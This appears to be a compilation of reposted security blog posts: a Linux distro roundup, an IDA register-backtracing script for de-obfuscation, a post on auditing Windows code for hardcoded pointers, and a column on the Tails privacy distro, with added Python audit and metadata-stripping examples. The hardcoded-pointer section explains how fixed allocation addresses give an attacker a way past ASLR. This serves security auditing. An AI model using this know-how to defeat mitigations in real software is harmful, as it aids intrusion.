At the risk of sounding repetitive, I have to go with Fuduntu for best laptop Linux distro as well. In fact, the distro is optimized for mobile computing on laptops and netbooks, including tools to help achieve maximum battery life when untethered. Users can see battery life improvements of 30 percent or more over other Linux distributions, the distro's developers say. Such optimizations combined with this solid and classic distro make for a winner on portable devices as well.

Best Enterprise Desktop Linux
The enterprise is one context in which I have to agree with recent years' evaluations, and that includes the enterprise desktop. While SUSE Linux Enterprise Desktop is surely RHEL's primary competitor, I think Red Hat Enterprise Linux is the clear leader in this area, with just the right combination of security, interoperability, productivity applications and management features.

Best Enterprise Server Linux
It's a similar situation on the server. While there's no denying SUSE Linux Enterprise Server has its advantages, Red Hat is pushing ahead in exciting new ways. Particularly notable about Red Hat this year, for example, is its new focus on Big Data and the hybrid cloud, bringing a fresh new world of possibilities to its customers.

Best Security-Enhanced Distribution
Security, of course, is one of the areas in which Linux really stands out from its proprietary competitors, due not just to the nature of Linux itself but also to the availability of several security-focused Linux distributions. Lightweight Portable Security is one relatively new contender that emerged back in 2011, and BackBox is another popular Ubuntu-based contender, but I still have to give my vote to BackTrack Linux, the heavyweight in this area whose penetration testing framework is used by the security community all over the world. Others surely have their advantages, but BackTrack is still the one to beat.

Best Multimedia Distribution
Ubuntu Studio has often been named the best distro for multimedia purposes in Linux.com's lists, but it's by no means the only contender. ZevenOS, for instance, is an interesting BeOS-flavored contender that came out with a major update last year. For sheer power and nimble performance, though, this year's nod goes to Arch Linux. With an active community and thousands of software packages available in its repositories, Arch stays out of the way so your PC can focus on the CPU-intensive tasks at hand.

Best Gaming Distribution
Last but certainly not least is the gaming category, which surely represents one of the biggest developments in the Linux world over this past year. While it may not be relevant for enterprise audiences, gaming has long been held up as a key reason many users have stayed with Windows, so Valve's decision to bring its Steam gaming platform to Linux is nothing if not significant. The Linux distro choice here? That would have to be Ubuntu, which is specifically promoted by the Valve team itself. "Best experienced on Ubuntu" reads the tag line that accompanied the Steam for Linux release last month, in fact. Bottom line: If you're into gaming, Ubuntu Linux is the way to go.

Have a different view on any of these categories? Please share your thoughts in the comments.

Source: The 2013 Top 7 Best Linux Distributions for You | Linux.com
-
[h=3]backtrace.py version 0.3[/h] backtrace.py version 0.3 has been pushed out to it's repo. A couple of notable features have been added. The previous version only tracked the use of the MOV instruction. This is kind of useful..I guess..well at least it was fun to code. The current version tracks whenever a register(ECX) or it's sub-register (CX) are manipulated. The old version relied on string comparisons. For example if we back trace from the highlighted code up we would see al is referenced then EAX, then byte_1003B03C, then dl, etc.. .text:10004E99 mov byte_1003B03C, al .text:10004E9E movsx ecx, byte_1003B03C .text:10004EA5 imul ecx, 0A2h .text:10004EAB mov byte_1003B03C, cl .text:10004EB1 movsx edx, byte_1003B03C .text:10004EB8 xor edx, 0A4h .text:10004EBE mov byte_1003B03C, dl .text:10004EC4 movsx eax, byte_1003B03C .text:10004ECB cdq .text:10004ECC mov ecx, 0C8h .text:10004ED1 idiv ecx .text:10004ED3 mov byte_1003B03C, al .text:10004ED8 xor eax, eax .text:10004EDA jmp short loc_10004F01 .text:10004EDC ; --------------------------------------------------------------------------- .text:10004EDC movsx edx, byte_1003B03C .text:10004EE3 or edx, 0D2h .text:10004EE9 mov byte_1003B03C, dl .text:10004EEF movsx eax, byte_1003B03C .text:10004EF6 imul eax, 0C1h .text:10004EFC mov byte_1003B03C, al The old version did not know that AL is the lower address of EAX due to the use of string comparison. The new version does a simple check of the register name and it's purpose. Note: there will be some issues if AH is moved into AL or other similar operations. I didn't code that logic in. If we were to back trace the code above we would have the following output. 
Python>s.backtrace(here(),1)
0x10004efc mov byte_1003B03C, al
0x10004ef6 imul eax, 0C1h
0x10004eef movsx eax, byte_1003B03C
0x10004ee9 mov byte_1003B03C, dl
0x10004ee3 or edx, 0D2h
0x10004edc movsx edx, byte_1003B03C
0x10004ed3 mov byte_1003B03C, al
0x10004ec4 movsx eax, byte_1003B03C
0x10004ebe mov byte_1003B03C, dl
0x10004eb8 xor edx, 0A4h
0x10004eb1 movsx edx, byte_1003B03C
0x10004eab mov byte_1003B03C, cl
0x10004ea5 imul ecx, 0A2h
0x10004e9e movsx ecx, byte_1003B03C
0x10004e99 mov byte_1003B03C, al

The code also tracks how some general purpose instructions manipulate different registers. Most of them are simple thanks to the x86 "destination, source" operand order. Not all of them are though. I spent a good amount of time wondering which variables to back trace when following instructions such as DIV: is EAX or the DIV operand more important to back trace? I went with the operand, but in the future I plan on creating a split back trace that tracks both EAX and the operand passed to DIV. Odds are there are still more general purpose instructions I need to check for. XADD is a pretty cool instruction; the shortest Fibonacci loop can be written using XADD. This version was written in order for me to crack an obfuscation technique that I have seen lately. Using backtrace.py and the last line of the dead code blocks I'm able to identify most of the junk code and variables. I'm sure there are flaws (like not tracing PUSH or POP...future release) but so far it is working well for me. I hope the code is of use to others. If you have any recommendations, thoughts, etc. please shoot me an email (line 20 of the source code) or ping me on Twitter.

Source: Hooked on Mnemonics Worked for Me: backtrace.py version 0.3
-
[h=3]Hardcoded Pointers[/h]

Use of a hardcoded pointer can enable an attacker to bypass ASLR. In this draft I describe potential methods to find hardcoded pointers in your target.

When exploiting particular vulnerabilities it is fundamental to read, write or jump to a predictable memory location in the process' address space. ASLR randomizes the memory locations of various key regions, including the base addresses of libraries. Even though we still see some high profile applications load libraries with ASLR disabled, we have high hopes they will fix the problem soon. That wouldn't solve the problem overall though: applying ASLR to all libraries does not mean there are no easily predictable locations in the process' address space.

There are API functions that accept a requested address and allocate memory at that address. These functions can be used to hardcode a memory address, and so to assign a fixed address to a pointer (CWE-587). As a consequence, they give an attacker a known address to read, write or jump to, bypassing ASLR. For the following functions you can specify the desired starting address of the allocation. When doing a security audit it's worth checking whether they are called with a hardcoded (non-NULL) address:

VirtualAlloc
VirtualAllocEx
VirtualAllocExNuma
MapViewOfFileEx
MapViewOfFileExNuma

The following functions also accept an address as a parameter (to read, write, free or query). They do not appear as useful for this purpose, but I list them for potential future use.
UnmapViewOfFile, WriteProcessMemory, ReadProcessMemory, FlushViewOfFile, FlushInstructionCache, Toolhelp32ReadProcessMemory, GetWriteWatch, ResetWriteWatch, ReadProcessMemoryProc64, VirtualUnlock, MapUserPhysicalPages, VirtualProtect, VirtualProtectEx, VirtualQueryEx, GetFrameSourceAddress, CompareFrameDestAddress, VirtualFree, VirtualFreeEx, FindNextFrame, WSPStringToAddress, CompareAddresses, AddressToString

It's also worth checking whether the application you audit uses shared memory, as some applications map it at a fixed address; even the Boost library supports this insecure method, describing it as follows: "The use of relative pointers is less efficient than using raw pointers, so if a user can succeed mapping the same file or shared memory object in the same address in two processes, using raw pointers can be a good idea. To map an object in a fixed address, the user can specify that address in the mapped region's constructor:"

mapped_region region
    ( shm                //Map shared memory
    , read_write         //Map it as read-write
    , 0                  //Map from offset 0
    , 0                  //Map until the end
    , (void*)0x3F000000  //Map it exactly there
    );

When auditing source code for hardcoded addresses it's worth looking for constants starting with 0x and ending with 0000, as some of them may be hardcoded memory addresses. I wrote a simple batch script for that. The other batch script I have is for binary code; I recommend using it if you don't find a bug by other methods. To use it you need to execute dasmdir.py on the binary file to produce a disassembly, then run the batch script on it to get the immediate values filtered.

This is interesting. Here is an example of someone asking how to allocate memory at a fixed address, unintentionally making their software less secure.

Source: Reversing on Windows: Hardcoded Pointers
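A Python audit helper for the checks described above, added here as an example (the post's own scripts are batch files and are not reproduced). It pulls the address argument out of calls to the five allocation and mapping functions listed above, flags hexadecimal literals as hardcoded addresses and other non-NULL expressions for manual review, and separately applies the post's "starts with 0x, ends with 0000" heuristic to both C source and IDA-style immediates. The sample source and disassembly lines are constructed for the example; the parameter positions in ALLOC_APIS follow the Win32 prototypes (lpAddress is the first parameter of VirtualAlloc, the second of VirtualAllocEx and VirtualAllocExNuma, and lpBaseAddress the sixth of MapViewOfFileEx and MapViewOfFileExNuma).

```python
import re

# Constructed sample source (not from any real project): the kind of lines an audit
# of the allocation APIs listed in the post would come across.
SAMPLE_SOURCE = """\
p = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
q = VirtualAlloc((LPVOID)0x10000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
base = MapViewOfFileEx(hMap, FILE_MAP_ALL_ACCESS, 0, 0, 0, (LPVOID)0x3F000000);
r = VirtualAllocEx(hProc, NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
s = VirtualAllocEx(hProc, (LPVOID)preferred, size, MEM_COMMIT, PAGE_READWRITE);
#define SHM_BASE 0x20000000
"""

# Constructed IDA-style disassembly lines (immediates use the trailing-h form).
SAMPLE_DISASM = """\
push    3F000000h
push    1000h
mov     eax, 0C8h
mov     edi, 10000000h
"""

# API -> zero-based position of the lpAddress / lpBaseAddress parameter.
ALLOC_APIS = {"VirtualAlloc": 0, "VirtualAllocEx": 1, "VirtualAllocExNuma": 1,
              "MapViewOfFileEx": 5, "MapViewOfFileExNuma": 5}
HEX = re.compile(r"0[xX][0-9A-Fa-f]+")
# The post's heuristic: starts with 0x (or is an IDA ...h immediate) and ends in 0000.
PAGE_CONST = re.compile(r"\b(0[xX][0-9A-Fa-f]*0000|[0-9][0-9A-Fa-f]*0000h)\b")


def split_args(text):
    """Split a C argument list on top-level commas; casts and nested calls stay whole."""
    args, depth, cur = [], 0, ""
    for ch in text:
        depth += (ch == "(") - (ch == ")")
        if ch == "," and depth == 0:
            args.append(cur.strip())
            cur = ""
        else:
            cur += ch
    if cur.strip():
        args.append(cur.strip())
    return args


def call_args(line, api):
    """Arguments of the first `api(...)` call on the line, or None."""
    m = re.search(r"\b%s\s*\(" % re.escape(api), line)
    if not m:
        return None
    depth = 1
    for i in range(m.end(), len(line)):
        depth += (line[i] == "(") - (line[i] == ")")
        if depth == 0:
            return split_args(line[m.end():i])
    return None


def classify(arg):
    """Verdict for the address argument of an allocation or mapping call."""
    bare = re.sub(r"\([^)]*\)", "", arg).strip()  # drop casts such as (LPVOID)
    if bare in ("NULL", "0", "nullptr"):
        return "ok: system chooses the address"
    if HEX.search(bare):
        return "HARDCODED: fixed address, predictable despite ASLR (CWE-587)"
    return "REVIEW: non-NULL address from an expression, check where it comes from"


def audit_source(text):
    """[(line_no, api, address_arg, verdict)] for every call to a listed API."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for api, idx in ALLOC_APIS.items():
            args = call_args(line, api)
            if args is not None and len(args) > idx:
                findings.append((n, api, args[idx], classify(args[idx])))
    return findings


def suspicious_constants(text):
    """[(line_no, literal)] for page-aligned-looking constants in source or disassembly."""
    return [(n, m.group(1)) for n, line in enumerate(text.splitlines(), 1)
            for m in PAGE_CONST.finditer(line)]


if __name__ == "__main__":
    for f in audit_source(SAMPLE_SOURCE):
        print("line %d: %s(... %s ...) -> %s" % f)
    print(suspicious_constants(SAMPLE_SOURCE), suspicious_constants(SAMPLE_DISASM))
```

The `REVIEW` verdict matters as much as `HARDCODED`: a variable passed as lpAddress is only safe if it was never seeded from a constant, so those call sites still need to be read by hand. The constant heuristic is deliberately noisy (sizes such as 0x10000 also end in 0000) and is a triage filter, not a finding on its own.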
-
toolsmith: Tails - The Amnesiac Incognito Live System
Privacy for anyone anywhere

Prerequisites/dependencies
Systems that can boot DVD, USB, or SD media (x86, no PowerPC or ARM), 1GB RAM

Introduction

“We will open the book. Its pages are blank. We are going to put words on them ourselves. The book is called Opportunity and its first chapter is New Year's Day.” -Edith Lovejoy Pierce

First and foremost, Happy New Year! If you haven’t read or heard about the perpetual stream of rather incredible disclosures continuing to emerge regarding the NSA’s activities as revealed by Edward Snowden, you’ve likely been completely untethered from the Matrix or have indeed been hiding under the proverbial rock. As the ISSA Journal focuses on Cyber Security and Compliance for the January 2014 issue, I thought it a great opportunity to weave a few privacy related current events into the discussion while operating under the auspicious umbrella of the Cyber Security label.

The most recent article that caught my attention was Reuters reporting that “as a key part of a campaign to embed encryption software that it could crack into widely used computer products, the U.S. National Security Agency arranged a secret $10 million contract with RSA, one of the most influential firms in the computer security industry.” The report indicates that RSA received $10M from the NSA in exchange for utilizing the agency-backed Dual Elliptic Curve Deterministic Random Bit Generator (Dual EC DRBG) as its preferred random number algorithm, an allegation that RSA denies in part. In September 2013 the New York Times reported that an NSA memo released by Snowden declared that “cryptanalytic capabilities are now coming online…vast amounts of encrypted Internet data which have up till now been discarded are now exploitable."
Ars Technica’s Dan Goodin described Operation Bullrun as “a combination of ‘supercomputers, technical trickery, court orders, and behind-the-scenes persuasion’ to undermine basic staples of Internet privacy, including virtual private networks (VPNs) and the widely used secure sockets layer (SSL) and transport layer security (TLS) protocols.” Finally, consider that, again as reported by Dan Goodin, a senior NSA cryptographer, Kevin Igoe, is also the co-chair of the Internet Engineering Task Force’s (IETF) Crypto Forum Research Group (CFRG). What could possibly go wrong? According to Dan, Igoe's leadership had largely gone unnoticed until the above mentioned reports surfaced in September 2013 exposing the role NSA agents have played in "deliberately weakening the international encryption standards adopted by developers."

I must admit I am conflicted. I believe in protecting the American citizenry above all else. The NSA claims that their surveillance efforts have thwarted attacks against America. Regardless of the debate over the right or wrong of how or if this was achieved, I honor the intent. Yet, while I believe Snowden’s actions are traitorous, as an Internet denizen I can understand his concerns. The problem is that he swore an oath to his country, was well paid to honor it, and then violated it.

Regardless of my take on these events and revelations, my obligation to you is to provide you with tooling options. The Information Systems Security Association (ISSA) is an international organization of information security professionals and practitioners. As such, are there means by which our global readership can better practice Internet privacy and security? While there is no panacea, I propose that the likes of The Amnesiac Incognito Live System, or Tails, might contribute to the cause.
Again, per the Tails team themselves: “Even though we're doing our best to offer you good tools to protect your privacy while using a computer, there is no magic or perfect solution to such a complex problem.” That said, Tails endeavors to help you preserve your privacy and anonymity. Tails documentation is fabulous; you would do well to start with a full read before using Tails to protect your privacy for the first time.

Tails

Tails, a merger of the Amnesia and Incognito projects, is a Debian 6 (Squeeze) based Linux distribution that works optimally as a live instance from DVD, USB, or SD media. Tails seeks to provide online anonymity and censorship circumvention through the Tor anonymity network. All software is configured to connect to the Internet through Tor, and if an application tries to connect to the Internet directly, the connection is automatically blocked for security purposes.

At this point the well informed amongst you are likely uttering a “whiskey tango foxtrot, Russ, in October The Guardian revealed that the NSA targeted the Tor network.” Yes, true that, but it doesn’t mean that you can’t safely use Tor in a manner that protects you. This is a great opportunity however to direct you to the Tails warning page. Please read this before you do anything else, it’s important. Schneier’s Guardian article also provides nuance: “The fact that all Tor users look alike on the internet makes it easy to differentiate Tor users from other web users. On the other hand, the anonymity provided by Tor makes it impossible for the NSA to know who the user is, or whether or not the user is in the US.”

Getting under way with Tails is easy. Download it, burn it to your preferred media, load the media into your preferred system, and boot it up. I prefer using Tails on USB media inclusive of a persistence volume; just remember to format the USB media in a manner that leaves room to create the persistent volume.
When you boot Tails, the first thing you’ll see, as noted in Figure 1, is the Tails Greeter, which offers you More Options. Selecting Yes leads you to the option to set an administrative password (recommended) as well as Windows XP Camouflage mode (makes Tails look like Windows XP when you may have shoulder surfers).

FIGURE 1: Tails Greeter

You can also boot into a virtual machine, but there are some specific drawbacks to this method (the host operating system and the virtualization software can monitor what you are doing in Tails). Tails will warn you about this, as seen in Figure 2.

FIGURE 2: Tails warns regarding a VM and confirms Tor

Tor

You’ll also note in Figure 2 that Tor Browser (built on Iceweasel, Debian's rebranded Firefox) is already configured to use Tor, including the Torbutton, NoScript, Cookie Monster, and Adblock Plus add-ons. There is one Tor enhancement to consider that can be added during the Tails boot menu sequence: interrupt the boot sequence with Tab, hit Space, and then add bridge to enable Tor Bridge Mode. According to the Tor Project, bridge relays, or bridges for short, are Tor relays that aren't listed in the main Tor directory. As such, even if your ISP is filtering connections to all known Tor relays, they probably won't be able to block all bridges. If you suspect access to the Tor network is being blocked, consider use of the Tor bridge feature, which Tails fully supports when booted in bridge mode. Control Tor with Vidalia, which is available via the onion icon in the notification area found in the upper right area of the Tails UI.

One last note on Tor use, as already described on the Tails Warning page you should have already read: your Tor use is only as good as your exit node.
Remember, “Tor is about hiding your location, not about encrypting your communication.” Tor does not, and cannot, encrypt the traffic between an exit node and the destination server. Therefore, any Tor exit node is in a position to capture any traffic passing through it, and you should thus use end-to-end encryption for all communications. Be aware that Tails also offers I2P as an alternative to Tor.

Encryption Options and Features

HTTPS Everywhere is already configured for you in Tor Browser. HTTPS Everywhere uses rulesets of regular expressions to rewrite URLs to HTTPS. Certain sites offer limited or partial support for encryption over HTTPS but make it difficult to use, in that they default to unencrypted HTTP or provide hyperlinks on encrypted pages that point back to the unencrypted site.

You can use Pidgin for instant messaging, which includes OTR (off-the-record) encryption. Each time you start Tails you can count on it to generate a random username for all Pidgin accounts. If you’re afraid the computer you’ve booted Tails on (a system in an Internet café or library) is not trustworthy because of something like a hardware keylogger, you can use the Florence virtual keyboard, also found in the notification area, as seen in Figure 3.

FIGURE 3: The Tails virtual keyboard

If you’re going to create a persistent volume (recommended) when you use Tails from USB media, do so easily with Applications | Tails | Configure persistent volume. Reboot, then be sure to enable persistence in the Tails Greeter. You will need to set up the USB stick to leave unused space for a persistent volume. You can securely wipe files and clean up available space thereafter with Nautilus Wipe: just right click a file or files in the Nautilus file manager and select Wipe to blow it away…forever…in perpetuity. KeePassX is available to securely manage passwords and store them on your persistent volume.
You can also configure all your keyrings (GPG, Gnome, Pidgin) as well as Claws Mail. Remember, the persistent volume is encrypted upon creation. You can encrypt text with a passphrase, encrypt and sign text with a public key, and decrypt and verify text with the Tails gpgApplet (the clipboard icon in the notification area).

One last cool Tails feature that doesn’t garner much attention is the Metadata Anonymisation app. This is not unlike Informatica 64’s OOMetaExtractor, from the same folks who bring you FOCA, as described in the March 2011 toolsmith. Metadata Anonymisation is found under Applications then Accessories. This application will strip all of those interesting file properties left in metadata, such as author names and dates of creation or change. I have used my share of metadata to create target lists for social engineering during penetration tests, so it’s definitely a good idea to clean docs if you’re going to publish or share them and wish to remain anonymous. Figure 4 shows a before and after collage of PowerPoint metadata for a recent presentation I gave.

There are numerous opportunities to protect yourself using The Amnesiac Incognito Live System and I strongly advocate for keeping an instance at the ready should you need it. It’s ideal for those of you who travel to hostile computing environments, as well as for those of you non-US readers who may not benefit from the same level of personal freedoms and protection from censorship that we typically enjoy here in the States (tongue somewhat in cheek given current events described herein).

Conclusion

Aside from hoping you’ll give Tails a good look and make use of it, I’d like to leave you with two related resources well worth your attention. The first is a 2007 presentation from Dan Shumow and Niels Ferguson of Microsoft titled On the Possibility of a Back Door in the NIST SP800-90 Dual Ec Prng. Yep, the same random number generator as described in the introduction to this column.
The second resource is from bettercrypto.org and is called Applied Crypto Hardening. Systems administrators should definitely give this one a read. Enjoy your efforts to shield yourself from watchful eyes and ears and let me know what you think of Tails. Ping me via Twitter via @holisticinfosec or email if you have questions (russ at holisticinfosec dot org). Cheers…until next month.

Posted by Russ McRee at 9:58 AM

Source: HolisticInfoSec: toolsmith: Tails - The Amnesiac Incognito Live System
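Returning to the Metadata Anonymisation application described in the column above, here is a worked illustration of what such a strip does to an Office document, added as an example rather than the Tails tool's code: OOXML files (docx, pptx, xlsx) are zip packages whose `docProps/core.xml` and `docProps/app.xml` parts carry the author, last editor, revision count, timestamps, company and total editing time that FOCA-style tooling harvests. The example builds a constructed, docx-shaped package in memory, removes those elements while leaving the title, application name and every other package entry untouched, and reports the properties before and after. It needs Python 3.8+ (for `xml_declaration=` in `ET.tostring`); the sample properties are invented, and the non-metadata parts are placeholders, not a valid document.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
    "xsi": "http://www.w3.org/2001/XMLSchema-instance",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}
for _prefix, _uri in NS.items():
    ET.register_namespace(_prefix, _uri)  # keep readable prefixes on re-serialisation

# Constructed docProps parts in the shape Office writes (values invented for the example).
CORE_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="%(cp)s" xmlns:dc="%(dc)s" xmlns:dcterms="%(dcterms)s" xmlns:xsi="%(xsi)s">
  <dc:title>Quarterly numbers</dc:title>
  <dc:creator>jdoe</dc:creator>
  <cp:lastModifiedBy>Jane Doe</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-01T09:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-12-20T17:30:00Z</dcterms:modified>
</cp:coreProperties>""" % NS
APP_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="%(ep)s">
  <Application>Microsoft Office PowerPoint</Application>
  <Company>Example Corp</Company>
  <TotalTime>37</TotalTime>
</Properties>""" % NS

# Elements whose values feed social engineering: who wrote it, where, and when.
STRIP = {
    "docProps/core.xml": {"{%s}creator" % NS["dc"], "{%s}lastModifiedBy" % NS["cp"],
                          "{%s}revision" % NS["cp"], "{%s}created" % NS["dcterms"],
                          "{%s}modified" % NS["dcterms"]},
    "docProps/app.xml": {"{%s}Company" % NS["ep"], "{%s}Manager" % NS["ep"],
                         "{%s}TotalTime" % NS["ep"]},
}


def build_sample_docx():
    """Constructed OOXML-shaped zip: the two metadata parts plus placeholder entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")  # placeholder, not a valid docx
        z.writestr("docProps/core.xml", CORE_XML)
        z.writestr("docProps/app.xml", APP_XML)
        z.writestr("word/document.xml", "<document/>")  # placeholder body
    return buf.getvalue()


def scrub_part(xml_bytes, tags):
    """Drop the listed child elements from one properties part."""
    root = ET.fromstring(xml_bytes)
    for child in list(root):
        if child.tag in tags:
            root.remove(child)
    return ET.tostring(root, encoding="UTF-8", xml_declaration=True)


def scrub_docx(data):
    """Rewrite the package, replacing only the metadata parts; everything else is copied."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for name in src.namelist():
            content = src.read(name)
            if name in STRIP:
                content = scrub_part(content, STRIP[name])
            dst.writestr(name, content)
    return out.getvalue()


def read_properties(data):
    """{local element name: text} across both properties parts, for before/after checks."""
    props = {}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in STRIP:
            for child in ET.fromstring(z.read(name)):
                props[child.tag.split("}")[-1]] = child.text
    return props


def part_names(data):
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return z.namelist()


if __name__ == "__main__":
    original = build_sample_docx()
    print("before:", read_properties(original))
    print("after: ", read_properties(scrub_docx(original)))
```

Note that this only addresses the package-level properties; a real strip also has to consider embedded images with their own EXIF data, tracked changes and comments inside the document body, which is why a dedicated tool is preferable to a one-off script.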